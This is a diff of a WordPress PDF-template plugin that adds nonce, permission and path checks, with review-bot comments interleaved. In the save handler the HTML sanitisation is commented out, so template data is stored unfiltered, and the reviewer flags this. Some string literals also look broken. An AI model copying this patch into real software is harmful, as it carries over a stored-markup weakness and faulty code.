+                        <label class="yeepdf_checkbox_label"><?php esc_html_e("Watermark text", 'pdf-for-woocommerce') ?></label>
                         <?php
                         do_action("yeepdf_watermark_text_settings", $pdfs);
                         ?>
@@ -172,19 +172,19 @@
                 </div>
                 <div class="yeepdf_setting_row">
                     <div class="yeepdf_settings_group-wrapper">
-                        <label class="yeepdf_checkbox_label"><?php esc_html_e("Watermark image", "pdf-for-wpforms") ?></label>
+                        <label class="yeepdf_checkbox_label"><?php esc_html_e("Watermark image", 'pdf-for-woocommerce') ?></label>
                         <?php
                         do_action("yeepdf_watermark_img_settings", $pdfs);
                         ?>
                     </div>
                     <div class="yeepdf_settings_group-wrapper">
-                        <label class="yeepdf_checkbox_label"><?php esc_html_e("Upload image", "pdf-for-wpforms") ?></label>
+                        <label class="yeepdf_checkbox_label"><?php esc_html_e("Upload image", 'pdf-for-woocommerce') ?></label>
                         <input type="button" class="upload-editor--image-ok button button-primary" value="Upload">
                     </div>
                 </div>
                 <div class="yeepdf_setting_row">
                     <div class="yeepdf_settings_group-wrapper">
-                        <label class="yeepdf_checkbox_label"><?php esc_html_e("Custom CSS", "pdf-for-wpforms") ?></label>
+                        <label class="yeepdf_checkbox_label"><?php esc_html_e("Custom CSS", 'pdf-for-woocommerce') ?></label>
                         <?php
                         $css = "";
                         if (isset($pdfs["css"])) {
@@ -196,7 +196,7 @@
                 </div>
                 <div class="yeepdf_setting_row">
                     <div class="yeepdf_settings_group-wrapper">
-                        <label class="yeepdf_checkbox_label"><?php esc_html_e("Disable Active Form", "pdf-for-wpforms") ?></label>
+                        <label class="yeepdf_checkbox_label"><?php esc_html_e("Disable Active Form", 'pdf-for-woocommerce') ?></label>
                         <?php
                         $css = "";
                         if (isset($pdfs["disable_active_form"]) && $pdfs["disable_active_form"] == "yes") {
@@ -237,7 +237,7 @@
                     <div class="" title="Templates">
                         <a href="#" class="button yeepdf-email-choose-template"><span
                                 class="dashicons dashicons-welcome-add-page"></span>
-                            <?php esc_html_e("Templates", "yeepdf")  ?></a>
+                            <?php esc_html_e("Templates", "pdf-for-woocommerce")  ?></a>
                     </div>
                     <div class="" title="Import Template">
                         <a href="#" class="button yeepdf-email-import"><span class="dashicons dashicons-upload"></span></a>
@@ -256,10 +256,10 @@
                             $url = add_query_arg(array("pdf_preview" => "preview", "preview" => 1, "id" => $post_id), get_home_url());
                         }
                         ?>
-                        <a class="button" target="_blank" href="<?php echo esc_url(wp_nonce_url($url, "yeepdf")) ?>"><span class="dashicons dashicons-visibility"></span> <?php esc_html_e("Preview", "yeepdf")  ?></a>
+                        <a class="button" target="_blank" href="<?php echo esc_url(wp_nonce_url($url, "yeepdf")) ?>"><span class="dashicons dashicons-visibility"></span> <?php esc_html_e("Preview", "pdf-for-woocommerce")  ?></a>
                     </div>
                     <div class="">
-                        <a href="#" class="button button-yeepdf-save button-primary-ok"><span class="dashicons dashicons-saved"></span> <?php esc_html_e("Save", "yeepdf")  ?></a>
+                        <a href="#" class="button button-yeepdf-save button-primary-ok"><span class="dashicons dashicons-saved"></span> <?php esc_html_e("Save", "pdf-for-woocommerce")  ?></a>
                     </div>
                 </div>
             </div>
@@ -271,22 +271,22 @@
                     <div class="builder__widget">
                         <div class="builder_main_info">
                             <div class="builder_main_info_text">
-                                <?php esc_attr_e("YeePDF - PDF Customizer", "yeepdf") ?>
+                                <?php esc_attr_e("YeePDF - PDF Customizer", "pdf-for-woocommerce") ?>
                             </div>
                             <div class="builder_main_info_icon" title="Go To Dashboard">
                                 <a href="<?php echo esc_url(get_admin_url() . "edit.php?post_type=yeepdf") ?>"><span class="dashicons dashicons-wordpress"></span></a>
                             </div>
                         </div>
                         <ul class="builder__tab">
-                            <li class="tab__block_elements"><a class="active" id="#tab__block"><span><?php esc_html_e("Elements", "pdf-for-wpforms")  ?></span> </a></li>
-                            <li><a class="" id="#tab__editor"><span><?php esc_html_e("Editor", "pdf-for-wpforms")  ?></span></a></li>
+                            <li class="tab__block_elements"><a class="active" id="#tab__block"><span><?php esc_html_e("Elements", 'pdf-for-woocommerce')  ?></span> </a></li>
+                            <li><a class="" id="#tab__editor"><span><?php esc_html_e("Editor", 'pdf-for-woocommerce')  ?></span></a></li>
                         </ul>
                         <div class="tab__inner">
                             <div class="tab__content active" id="tab__block">
                                 <div class="builder__widget--inner">
                                     <div class="builder__widget_tab builder__widget_genaral">
                                         <div class="builder__widget_tab_title"><span
-                                                class="builder__widget_tab_title_t"><?php esc_attr_e("Genaral", "yeepdf") ?></span><span
+                                                class="builder__widget_tab_title_t"><?php esc_attr_e("Genaral", "pdf-for-woocommerce") ?></span><span
                                                 class="builder__widget_tab_title_icon dashicons dashicons-arrow-down-alt2"></span><span
                                                 class="builder__widget_tab_title_icon dashicons dashicons-arrow-up-alt2"></span>
                                         </div>
@@ -298,7 +298,7 @@
                                 <div class="builder__widget--inner">
                                     <div class="builder__widget_tab builder__widget_columns">
                                         <div class="builder__widget_tab_title"><span
-                                                class="builder__widget_tab_title_t"><?php esc_attr_e("Columns", "yeepdf") ?></span><span
+                                                class="builder__widget_tab_title_t"><?php esc_attr_e("Columns", "pdf-for-woocommerce") ?></span><span
                                                 class="builder__widget_tab_title_icon dashicons dashicons-arrow-down-alt2"></span><span
                                                 class="builder__widget_tab_title_icon dashicons dashicons-arrow-up-alt2"></span><span
                                                 class="builder__widget_tab_title_icon dashicons dashicons-arrow-up-alt2"></span>
@@ -319,11 +319,11 @@
                                 <div class="builder_main_footer_text">
                                     <a href="<?php echo esc_url(get_dashboard_url()) ?>"><span
                                             class="dashicons dashicons-arrow-left-alt"></span>
-                                        <?php esc_attr_e("BACK TO DASHBOARD", "yeepdf") ?></a>
+                                        <?php esc_attr_e("BACK TO DASHBOARD", "pdf-for-woocommerce") ?></a>
                                 </div>
                                 <div class="builder_main_footer_icon">
                                     <a href="#"
-                                        class="button button-primary yeepdf_button_settings"><?php esc_attr_e("SETTINGS", "yeepdf") ?></a>
+                                        class="button button-primary yeepdf_button_settings"><?php esc_attr_e("SETTINGS", "pdf-for-woocommerce") ?></a>
                                 </div>
                             </div>
                         </div>
@@ -332,7 +332,7 @@
             </div>
             <div class="email-builder-main" data-type="main">
                 <div class="email-builder-main-change_backgroud" data-type="main"><i class="pdf-creator-icon icon-pencil"></i>
-                    <?php esc_html_e("Settings PDF", "pdf-for-wpforms") ?></div>
+                    <?php esc_html_e("Settings PDF", 'pdf-for-woocommerce') ?></div>
                 <div class="builder__list builder__list--js">
                     <div class="builder-row-container builder__item">
                         <div style="background-color: #ffffff" data-background_full="not" data-type="row1"
@@ -347,10 +347,10 @@
         <?php
         $data_js = get_post_meta($post_id, 'data_email', true);
         if (is_array($data_js)) {
-            $data_js = json_encode($data_js);
+            $data_js = wp_json_encode($data_js);
         }
         ?>
-        <textarea name="data_email" class="data_email hidden"><?php echo esc_attr($data_js) ?></textarea>
+        <textarea name="data_email" class="data_email hidden"><?php echo esc_textarea($data_js) ?></textarea>
         <script type="text/javascript">
             <?php
             $data = array();
@@ -375,7 +375,8 @@
         }
         $add_libs = apply_filters("yeepdf_add_libs", $add_libs);
         if ($add_libs) {
-            $ver = time();
+            $ver = "6.5.0";
+            //$ver = time();
             wp_enqueue_script('jquery');
             wp_enqueue_style('yeepdf-font', YEEPDF_CREATOR_BUILDER_URL . "backend/css/pdfcreator.css", array(), $ver);
             wp_enqueue_style('yeepdf-momonga', YEEPDF_CREATOR_BUILDER_URL . "backend/css/momonga.css", array("wp-jquery-ui-dialog", "wp-color-picker"), $ver);
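Review bot: `$ver = "6.5.0";` hard-codes the plugin version in a second place, so this cache-buster goes stale on the next release unless someone remembers to edit this line; prefer the plugin's version constant (if one is defined alongside YEEPDF_CREATOR_BUILDER_URL) so the asset version tracks the release automatically. The commented-out `//$ver = time();` is dead code and should be removed rather than kept as a toggle: a time()-based version defeats browser caching on every page load, which is exactly what this change is fixing.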
@@ -422,7 +423,7 @@
                 'yeepdf_script',
                 array(
                     'ajax_url' => admin_url('admin-ajax.php'),
-                    'youtube_play_src' => "pdf-for-wpforms" . "images/youtube_play.png",
+                    'youtube_play_src' => 'pdf-for-woocommerce' . "images/youtube_play.png",
                     'yeepdf_url_plugin' => YEEPDF_CREATOR_BUILDER_URL,
                     'shortcodes' =>  $shortcodes,
                     'google_font_font_formats' => $font_formats,
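Review bot: `'youtube_play_src' => 'pdf-for-woocommerce' . "images/youtube_play.png"` evaluates to the literal string pdf-for-woocommerceimages/youtube_play.png, which is neither a URL nor a path; the text-domain search-and-replace was applied to a value that was never an i18n domain (the pre-patch "pdf-for-wpforms" . "images/..." was equally broken). Judging by the neighbouring `'yeepdf_url_plugin' => YEEPDF_CREATOR_BUILDER_URL`, the intended value appears to be `YEEPDF_CREATOR_BUILDER_URL . "images/youtube_play.png"`, with trailingslashit() if the constant has no trailing slash.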
@@ -450,7 +451,7 @@
                     font-style: normal;
                     font-weight: 400;
                     font-display: block;
-                    src: url(<?php echo esc_url(YEEPDF_CREATOR_BUILDER_PATH) ?>"vendor/mpdf/mpdf/ttfonts/fontawesome.ttf") format("truetype");
+                    src: url(<?php echo esc_url(YEEPDF_CREATOR_BUILDER_URL) ?>"vendor/mpdf/mpdf/ttfonts/fontawesome.ttf") format("truetype");
                 }
                 .fontawesome {
                     font-family: "fontawesome";
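Review bot: switching YEEPDF_CREATOR_BUILDER_PATH to YEEPDF_CREATOR_BUILDER_URL is the right fix (the old line wrote the server's absolute filesystem path into CSS served to the browser, disclosing the install path, and esc_url() would mangle a filesystem path anyway), but the quoting is still wrong: the opening " sits after the PHP tag, so the rendered CSS is url(https://.../"vendor/mpdf/mpdf/ttfonts/fontawesome.ttf") with a stray quote inside the url() token, which browsers reject and the icon font never loads. Build the full URL in PHP and quote it once: src: url("<?php echo esc_url(YEEPDF_CREATOR_BUILDER_URL . 'vendor/mpdf/mpdf/ttfonts/fontawesome.ttf') ?>") format("truetype");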
@@ -524,15 +525,17 @@
             'yeepdf',
             array(
                 'labels' => array(
-                    'name' => esc_html__('PDF Templates', "pdf-for-wpforms"),
-                    'add_new' => esc_html__('New Template', "pdf-for-wpforms"),
-                    'singular_name' => esc_html__('yeepdfs', "pdf-for-wpforms")
+                    'name' => esc_html__('PDF Templates', 'pdf-for-woocommerce'),
+                    'add_new' => esc_html__('New Template', 'pdf-for-woocommerce'),
+                    'new_item' => esc_html__('New Template', 'pdf-for-woocommerce'),
+                    'add_new_item' => esc_html__('New Template', 'pdf-for-woocommerce'),
+                    'singular_name' => esc_html__('yeepdfs', 'pdf-for-woocommerce')
                 ),
-                'public' => true,
+                'public' => false,
                 'has_archive' => true,
                 'supports'    => array('title'),
                 'show_in_menu' => true,
-                'rewrite' => array('slug' => 'yeepdf'),
+                'show_ui' => true,
                 'show_in_rest' => true,
                 'menu_icon'           => 'dashicons-email',
                 'menu_position' => 100,
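Review bot: with `'public' => false` the `'has_archive' => true` line is dead (a non-public type has no front-end archive, and the rewrite slug is removed in this same hunk), so drop it rather than imply a front-end surface that no longer exists. More important, `'show_in_rest' => true` is unchanged, so yeepdf templates remain reachable through the REST API regardless of the public flag; confirm that is intended and that the default controller's permission checks for this type are what you expect (reads of published templates versus edit context gated on edit_posts), otherwise set show_in_rest to false or supply a rest_controller_class with explicit permission callbacks.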
@@ -542,21 +545,112 @@
             )
         );
     }
+    function yeepdf_allow_custom_css($styles)
+    {
+        $styles[] = 'position';
+        $styles[] = 'z-index';
+        $styles[] = 'top';
+        $styles[] = 'right';
+        $styles[] = 'bottom';
+        $styles[] = 'left';
+        $styles[] = 'width';
+        $styles[] = 'min-width';
+        $styles[] = 'max-width';
+        $styles[] = 'height';
+        $styles[] = 'min-height';
+        $styles[] = 'max-height';
+        $styles[] = 'display';
+        $styles[] = 'overflow';
+        $styles[] = 'float';
+        $styles[] = 'clear';
+        $styles[] = 'margin';
+        $styles[] = 'margin-top';
+        $styles[] = 'margin-right';
+        $styles[] = 'margin-bottom';
+        $styles[] = 'margin-left';
+        $styles[] = 'padding';
+        $styles[] = 'padding-top';
+        $styles[] = 'padding-right';
+        $styles[] = 'padding-bottom';
+        $styles[] = 'padding-left';
+
+        $styles[] = 'border';
+        $styles[] = 'border-collapse';
+        $styles[] = 'border-top';
+        $styles[] = 'border-right';
+        $styles[] = 'border-bottom';
+        $styles[] = 'border-left';
+        $styles[] = 'border-radius';
+        $styles[] = 'border-color';
+        $styles[] = 'border-style';
+        $styles[] = 'border-width';
+        $styles[] = 'background';
+        $styles[] = 'background-color';
+        $styles[] = 'background-image'; // Lưu ý: WP sẽ tự check URL bên trong cái này để chặn link độc
+        $styles[] = 'color';
+        $styles[] = 'opacity';
+        $styles[] = 'box-shadow';
+        $styles[] = 'font-family';
+        $styles[] = 'font-size';
+        $styles[] = 'font-weight';
+        $styles[] = 'font-style';
+        $styles[] = 'text-align';
+        $styles[] = 'text-transform';
+        $styles[] = 'text-decoration';
+        $styles[] = 'line-height';
+        $styles[] = 'letter-spacing';
+        $styles[] = 'white-space';
+        $styles[] = 'cursor';
+        $styles[] = 'vertical-align';
+        return $styles;
+    }
     function save_metabox($post_id, $post)
     {
+        if (defined('DOING_AUTOSAVE') && DOING_AUTOSAVE) {
+            return;
+        }
+        if (wp_is_post_autosave($post_id) || wp_is_post_revision($post_id)) {
+            return;
+        }
+        if (!($post instanceof WP_Post) || $post->post_type !== 'yeepdf') {
+            return;
+        }
+        if (!current_user_can('edit_post', $post_id)) {
+            return;
+        }
+        if (!isset($_POST['_yeepdf_check_nonce']) || !wp_verify_nonce(sanitize_text_field(wp_unslash($_POST['_yeepdf_check_nonce'])), '_yeepdf_check_nonce')) {
+            return;
+        }
         if (isset($_POST['data_email'])) {
-            $data_email = ($_POST['data_email']);
-            update_post_meta($post_id, 'data_email', $data_email);
+            $raw = wp_unslash($_POST['data_email']);
+            $raw = is_string($raw) ? trim($raw) : '';
+            if ($raw !== '') {
+                $decoded = json_decode($raw, true);
+                // Only accept valid JSON (array/object). Reject scalars and invalid JSON.
+                if (json_last_error() === JSON_ERROR_NONE && is_array($decoded)) {
+                    //add_filter('safe_style_css', array($this, 'yeepdf_allow_custom_css'));
+                    //$clean_data = map_deep($decoded, 'wp_kses_post');
+                    $clean_data = $decoded;
+                    //remove_filter('safe_style_css', array($this, 'yeepdf_allow_custom_css'));
+                    update_post_meta($post_id, 'data_email', $clean_data);
+                } else {
+                    // Invalid JSON - don't overwrite existing stored template.
+                    error_log('YeePDF: invalid JSON received for data_email on post_id=' . absint($post_id));
+                }
+            } else {
+                // Empty value clears the meta.
+                error_log('YeePDF: invalid JSON received for data_email on post_id=' . absint($post_id));
+            }
         }
         if (isset($_POST['builder_pdf_settings_font_family'])) {
-            $builder_pdf_settings_font_family = sanitize_text_field($_POST['builder_pdf_settings_font_family']);
+            $builder_pdf_settings_font_family = sanitize_text_field(wp_unslash($_POST['builder_pdf_settings_font_family']));
             update_post_meta($post_id, '_builder_pdf_settings_font_family', $builder_pdf_settings_font_family);
         }
         if (isset($_POST['builder_pdf_settings'])) {
             $datas = array();
-            if (array($_POST["builder_pdf_settings"])) {
+            if (is_array($_POST["builder_pdf_settings"])) {
                 foreach ($_POST["builder_pdf_settings"] as $key => $value) {
-                    $datas[$key] = sanitize_textarea_field($value);
+                    $datas[sanitize_key($key)] = sanitize_textarea_field(wp_unslash($value));
                 }
                 update_post_meta($post_id, '_builder_pdf_settings', $datas);
             }
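Review bot: in save_metabox the sanitisation this hunk was evidently written for is commented out (`//add_filter('safe_style_css', ...)`, `//$clean_data = map_deep($decoded, 'wp_kses_post');` and the matching remove_filter), leaving `$clean_data = $decoded;`, so the decoded template is stored in data_email with no HTML filtering, and the new yeepdf_allow_custom_css() method (whose Vietnamese comment on background-image says WordPress checks the URL inside it to block malicious links) is unreachable code. The new nonce and `current_user_can('edit_post', $post_id)` checks mean only a user who can edit the template can store it, which is the correct authorization boundary, but whatever renders data_email must then treat it as untrusted HTML; either re-enable the map_deep/wp_kses_post pass together with the safe_style_css filter, or state in the commit why raw storage is acceptable and where output escaping happens. Two smaller points: the else branch's comment says "Empty value clears the meta" but the code neither calls delete_post_meta() nor distinguishes this case from the invalid-JSON branch (it logs the same 'invalid JSON' message), so either delete the meta there or fix the comment and message; and `sanitize_textarea_field(wp_unslash($value))` in the builder_pdf_settings loop is not meaningful for a nested array value, so guard with is_scalar($value) before sanitising.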
@@ -575,7 +669,7 @@
     {
         add_meta_box(
             'email-builder-main',
-            esc_html__('Builder PDF', "pdf-for-wpforms"),
+            esc_html__('Builder PDF', 'pdf-for-woocommerce'),
             array($this, 'email_builder_main'),
             'yeepdf',
             'normal',
@@ -684,17 +778,17 @@
             <img src="<?php echo esc_url($args["img"]) ?>">
             <div class="demo_content">
                 <div class="demo-title"><?php echo esc_html($args["title"]) ?></div>
-                <div class="demo-tags"><?php echo implode(", ", $args["cat"]) ?></div>
+                <div class="demo-tags"><?php echo esc_html(implode(", ", $args["cat"])) ?></div>
                 <div class="yeepdf-email-actions">
                     <div class="demo-fl">
                         <a class="button yeepdf-email-actions-import"
-                            href="#"><?php esc_html_e("Import", "pdf-for-wpforms") ?></a>
+                            href="#"><?php esc_html_e("Import", 'pdf-for-woocommerce') ?></a>
                         <a target="_blank" class="button yeepdf-email-actions-design"
-                            href="<?php echo esc_url($url_design) ?>"><?php esc_html_e("Design", "pdf-for-wpforms") ?></a>
+                            href="<?php echo esc_url($url_design) ?>"><?php esc_html_e("Design", 'pdf-for-woocommerce') ?></a>
                     </div>
                     <div class="demo-fr">
                         <a target="_blank" class="button yeepdf-email-actions-view"
-                            href="<?php echo esc_url($url_view) ?>"><?php esc_html_e("Preview", "pdf-for-wpforms") ?></a>
+                            href="<?php echo esc_url($url_view) ?>"><?php esc_html_e("Preview", 'pdf-for-woocommerce') ?></a>
                     </div>
                     <div class="clear"></div>
                 </div>
--- a/pdf-for-elementor-forms/backend/settings.php
+++ b/pdf-for-elementor-forms/backend/settings.php
@@ -1,180 +1,217 @@
 <?php
-if ( ! defined( 'ABSPATH' ) ) exit; // Exit if accessed directly
+if (! defined('ABSPATH')) exit; // Exit if accessed directly
 global $yeepdf_settings_main;
-class Yeepdf_Settings_Main {
+class Yeepdf_Settings_Main
+{
 	private $notices = array();
-	function __construct() {
-		add_action( 'admin_menu', array( $this, 'add_plugin_page' ) );
-		add_action( 'wp_ajax_pdfceator_remove_font', array($this,"remove_font"));
-		add_action( 'yeepdf_custom_sizes', array($this,"add_sizes"));
-		add_action( 'admin_init', array( $this, 'plugins_loaded' ) );
-		add_action( 'wp_ajax_yeepdf_dropbox_client_id_validate', [ $this, 'ajax_validate_api_token' ] );
-		add_action( "yeepdf_after_settings", array($this,"yeepdf_after_settings"),10);
-	}
-	function yeepdf_after_settings(){
-		?>
+	function __construct()
+	{
+		add_action('admin_menu', array($this, 'add_plugin_page'));
+		add_action('wp_ajax_yeepdf_remove_font', array($this, "remove_font"));
+		add_action('yeepdf_custom_sizes', array($this, "add_sizes"));
+		add_action('admin_init', array($this, 'plugins_loaded'));
+		add_action('wp_ajax_yeepdf_dropbox_client_id_validate', [$this, 'ajax_validate_api_token']);
+		add_action("yeepdf_after_settings", array($this, "yeepdf_after_settings"), 10);
+		add_filter('upload_mimes', array($this, 'custom_upload_mimes'));
+	}
+	function custom_upload_mimes($mimes)
+	{
+		$mimes['ttf'] = 'application/x-font-ttf';
+		return $mimes;
+	}
+	function yeepdf_after_settings()
+	{
+?>
 		<tr valign="top">
-			<th scope="row"><?php esc_html_e("Save PDF to Dropbox","pdf-for-wpforms") ?>
+			<th scope="row"><?php esc_html_e("Save PDF to Dropbox", 'pdf-for-woocommerce') ?>
 			</th>
 			<td>
 				<div class="pro_disable pro_disable_fff">
-					Upgrade to pro version
+					<?php
+					esc_html_e('Upgrade to pro version', 'pdf-for-woocommerce');
+					?>
 				</div>
 			</td>
 		</tr>
-		<?php
+	<?php
+	}
+	function ajax_validate_api_token()
+	{
+		check_ajax_referer("yeepdf_dropbox", '_nonce');
+		$clientId = sanitize_text_field(wp_unslash($_POST['clientId']));
+		$clientSecret = sanitize_text_field(wp_unslash($_POST['clientSecret']));
+		$authorizationCode = sanitize_text_field(wp_unslash($_POST['authorizationCode']));
+		if (! isset($_POST['clientId'])) {
+			wp_send_json_error();
+		}
+		if (! current_user_can('manage_options')) {
+			wp_send_json_error('Permission denied');
+		}
+		try {
+			$datas = Yeepdf_Dropbox_API::get_token($clientId, $clientSecret, $authorizationCode);
+			if ($datas == "ok") {
+				wp_send_json_success($datas);
+			} else {
+				wp_send_json_error($datas);
+			}
+		} catch (Exception $exception) {
+			wp_send_json_error();
+		}
+		wp_send_json_success();
 	}
-	function ajax_validate_api_token(){
-		check_ajax_referer( "yeepdf_dropbox", '_nonce' );
-        $clientId = sanitize_text_field(wp_unslash($_POST['clientId']));
-        $clientSecret = sanitize_text_field(wp_unslash($_POST['clientSecret']));
-        $authorizationCode = sanitize_text_field(wp_unslash($_POST['authorizationCode']));
-        if ( ! isset( $_POST['clientId'] ) ) {
-            wp_send_json_error();
-        }
-        if ( ! current_user_can( 'manage_options' ) ) {
-            wp_send_json_error( 'Permission denied' );
-        }
-        try {
-           $datas = Yeepdf_Dropbox_API::get_token($clientId,$clientSecret,$authorizationCode);
-           if($datas == "ok"){
-                wp_send_json_success($datas);
-           }else{
-                wp_send_json_error($datas);
-           }
-        } catch ( Exception $exception ) {
-            wp_send_json_error();
-        }
-        wp_send_json_success();
-	}
-	public static function generateRandomString($length = 15) {
-	    $characters = '0123456789abcdefghijklmnopqrstuvwxyz_';
-	    $charactersLength = strlen($characters);
-	    $randomString = '';
-	    for ($i = 0; $i < $length; $i++) {
-	        $randomString .= $characters[random_int(0, $charactersLength - 1)];
-	    }
-	    return $randomString;
-	}
-	public static function maybe_get_random_dir() {
-		$settings_folder = get_option("pdf_creator_save_folder","pdfs/downloads");
-		$uploads_folder = apply_filters("yeepdf_folder_download",$settings_folder);
-		$uploads_folder = rtrim($uploads_folder, "/\");
+	public static function generateRandomString($length = 15)
+	{
+		$characters = '0123456789abcdefghijklmnopqrstuvwxyz_';
+		$charactersLength = strlen($characters);
+		$randomString = '';
+		for ($i = 0; $i < $length; $i++) {
+			$randomString .= $characters[random_int(0, $charactersLength - 1)];
+		}
+		return $randomString;
+	}
+	public static function maybe_get_random_dir()
+	{
+		$settings_folder = get_option("pdf_creator_save_folder", "pdfs/downloads");
+		$uploads_folder = apply_filters("yeepdf_folder_download", $settings_folder);
+		$uploads_folder = ltrim($uploads_folder, "/\");
+		if (strpos($uploads_folder, '..') !== false) {
+			$uploads_folder = 'pdfs/downloads';
+		}
 		return $uploads_folder;
-	}
-	public static function maybe_add_random_dir() {
+	}
+	public static function maybe_add_random_dir()
+	{
 		$upload_dir = wp_upload_dir();
 		$uploads_folder = self::maybe_get_random_dir();
-		$dir = $upload_dir['basedir'] . '/'.$uploads_folder.'/';
-		$url = $upload_dir['baseurl'] . '/'.$uploads_folder.'/';
-		$settings_folder = get_option("pdf_creator_save_random","");
-		$disable_random = apply_filters("yeepdf_disable_random_folder",$settings_folder);
-		if($disable_random != "yes" ){
+		$dir = $upload_dir['basedir'] . '/' . $uploads_folder . '/';
+		$url = $upload_dir['baseurl'] . '/' . $uploads_folder . '/';
+		$settings_folder = get_option("pdf_creator_save_random", "");
+		$disable_random = apply_filters("yeepdf_disable_random_folder", $settings_folder);
+		if ($disable_random != "yes") {
 			do {
 				$rand_max = mt_getrandmax();
 				$rand = self::generateRandomString();
-				$dir_new = path_join( $dir, $rand );
-				$url_new = $url.$rand;
-			} while ( file_exists( $dir_new ) );
-			if ( wp_mkdir_p( $dir_new ) ) {
-				return array("path"=>$dir_new."/","url"=>$url_new."/");
-			}
-			return array("path"=>$dir,"url"=>$url);
-		}else{
-			if ( wp_mkdir_p( $dir ) ) {
-				return array("path"=>$dir,"url"=>$url);
-			}
-			return array("path"=>$dir,"url"=>$url);
-		}
-	}
-	public static function destroy_all_files($dirPath=null) {
-		if(!$dirPath) {
-			$upload_dir = wp_upload_dir();
+				$dir_new = path_join($dir, $rand);
+				$url_new = $url . $rand;
+			} while (file_exists($dir_new));
+			if (wp_mkdir_p($dir_new)) {
+				return array("path" => $dir_new . "/", "url" => $url_new . "/");
+			}
+			return array("path" => $dir, "url" => $url);
+		} else {
+			if (wp_mkdir_p($dir)) {
+				return array("path" => $dir, "url" => $url);
+			}
+			return array("path" => $dir, "url" => $url);
+		}
+	}
+	public static function destroy_all_files($dirPath = null)
+	{
+		global $wp_filesystem;
+		if (! $wp_filesystem) {
+			require_once ABSPATH . 'wp-admin/includes/file.php';
+			WP_Filesystem();
+		}
+		$upload_dir = wp_upload_dir();
+		$basedir    = wp_normalize_path($upload_dir['basedir']);
+		//dirPath → set default
+		if (empty($dirPath)) {
 			$uploads_folder = self::maybe_get_random_dir();
-			$dirPath = $upload_dir['basedir'] . '/'.$uploads_folder.'/';
-			if (! is_dir($dirPath)) {
-				//throw new InvalidArgumentException("$dirPath must be a directory");
-			}
-			if (substr($dirPath, strlen($dirPath) - 1, 1) != '/') {
-				$dirPath .= '/';
-			}
+			$dirPath = trailingslashit($upload_dir['basedir'] . '/' . $uploads_folder);
+		}
+		$dirPath = wp_normalize_path($dirPath);
+		// CHECK
+		if (strpos($dirPath, $basedir) !== 0) {
+			return;
+		}
+		if (! is_dir($dirPath)) {
+			return;
 		}
-		$dirPath = rtrim($dirPath, '/') . '/';
 		$items = scandir($dirPath);
 		foreach ($items as $item) {
-			if ($item === '.' || $item === '..') continue;
-			$path = $dirPath . $item;
+			if ($item === '.' || $item === '..') {
+				continue;
+			}
+			$path = $dirPath . '/' . $item;
 			if (is_dir($path)) {
 				self::destroy_all_files($path);
 			} else {
-				unlink($path);
+				wp_delete_file($path);
 			}
 		}
-		rmdir($dirPath);
+		$wp_filesystem->rmdir($dirPath, true);
 	}
-	public function plugins_loaded() {
+	public function plugins_loaded()
+	{
 		$this->check_mb_string();
 		$this->check_mb_string_regex();
 		$this->check_gd();
 		$this->check_dom();
-		$this->check_ram( ini_get( 'memory_limit' ) );
-		if ( count( $this->notices ) > 0 ) {
-			add_action( 'admin_notices', array( $this, 'display_notices' ) );
+		$this->check_ram(ini_get('memory_limit'));
+		if (count($this->notices) > 0) {
+			add_action('admin_notices', array($this, 'display_notices'));
 		}
 	}
-	public function display_notices() {
-		?>
+	public function display_notices()
+	{
+	?>
 		<div class="error">
-			<p><strong><?php esc_html_e( 'PDF Installation Problem', 'pdf-for-wpforms' ); ?></strong></p>
-			<p><?php esc_html_e( 'The minimum requirements for PDF have not been met. Please fix the issue(s) below to use the plugin:', 'pdf-for-wpforms' ); ?></p>
+			<p><strong><?php esc_html_e('PDF Installation Problem', 'pdf-for-woocommerce'); ?></strong></p>
+			<p><?php esc_html_e('The minimum requirements for PDF have not been met. Please fix the issue(s) below to use the plugin:', 'pdf-for-woocommerce'); ?></p>
 			<ul>
-			<?php foreach ( $this->notices as $notice ): ?>
-				<li style="padding-left: 15px;"><?php echo wp_kses_post( $notice ); ?></li>
-			<?php endforeach; ?>
-		</ul>
+				<?php foreach ($this->notices as $notice): ?>
+					<li style="padding-left: 15px;"><?php echo wp_kses_post($notice); ?></li>
+				<?php endforeach; ?>
+			</ul>
 		</div>
-		<?php
+	<?php
 	}
-	public function check_mb_string() {
-		if ( ! extension_loaded( 'mbstring' ) ) {
-			$this->notices[] = sprintf( esc_html__( 'The PHP Extension MB String could not be detected. Contact your web hosting provider to fix. %1$sGet more info%2$s.', 'pdf-for-wpforms' ), '<a href="https://pdf.add-ons.org/wordpress-pdf-activation-errors-and-how-to-fix-them/">', '</a>' );
+	public function check_mb_string()
+	{
+		if (! extension_loaded('mbstring')) {
+			$this->notices[] = sprintf(esc_html__('The PHP Extension MB String could not be detected. Contact your web hosting provider to fix. %1$sGet more info%2$s.', 'pdf-for-woocommerce'), '<a href="https://pdf.add-ons.org/wordpress-pdf-activation-errors-and-how-to-fix-them/">', '</a>');
 		}
 	}
-	public function check_mb_string_regex() {
-		if ( extension_loaded( 'mbstring' ) && ! function_exists( 'mb_regex_encoding' ) ) {
-			$this->notices[] = sprintf( esc_html__( 'The PHP Extension MB String does not have MB Regex enabled. Contact your web hosting provider to fix. %1$sGet more info%2$s.', 'pdf-for-wpforms' ), '<a href="https://pdf.add-ons.org/wordpress-pdf-activation-errors-and-how-to-fix-them/">', '</a>' );
+	public function check_mb_string_regex()
+	{
+		if (extension_loaded('mbstring') && ! function_exists('mb_regex_encoding')) {
+			$this->notices[] = sprintf(esc_html__('The PHP Extension MB String does not have MB Regex enabled. Contact your web hosting provider to fix. %1$sGet more info%2$s.', 'pdf-for-woocommerce'), '<a href="https://pdf.add-ons.org/wordpress-pdf-activation-errors-and-how-to-fix-them/">', '</a>');
 		}
 	}
-	public function check_gd() {
-		if ( ! extension_loaded( 'gd' ) ) {
-			$this->notices[] = sprintf( esc_html__( 'The PHP Extension GD Image Library could not be detected. Contact your web hosting provider to fix. %1$sGet more info%2$s.', 'pdf-for-wpforms' ), '<a href="https://pdf.add-ons.org/wordpress-pdf-activation-errors-and-how-to-fix-them/">', '</a>' );
+	public function check_gd()
+	{
+		if (! extension_loaded('gd')) {
+			$this->notices[] = sprintf(esc_html__('The PHP Extension GD Image Library could not be detected. Contact your web hosting provider to fix. %1$sGet more info%2$s.', 'pdf-for-woocommerce'), '<a href="https://pdf.add-ons.org/wordpress-pdf-activation-errors-and-how-to-fix-them/">', '</a>');
 		}
 	}
-	public function check_dom() {
-		if ( ! extension_loaded( 'dom' ) || ! class_exists( 'DOMDocument' ) ) {
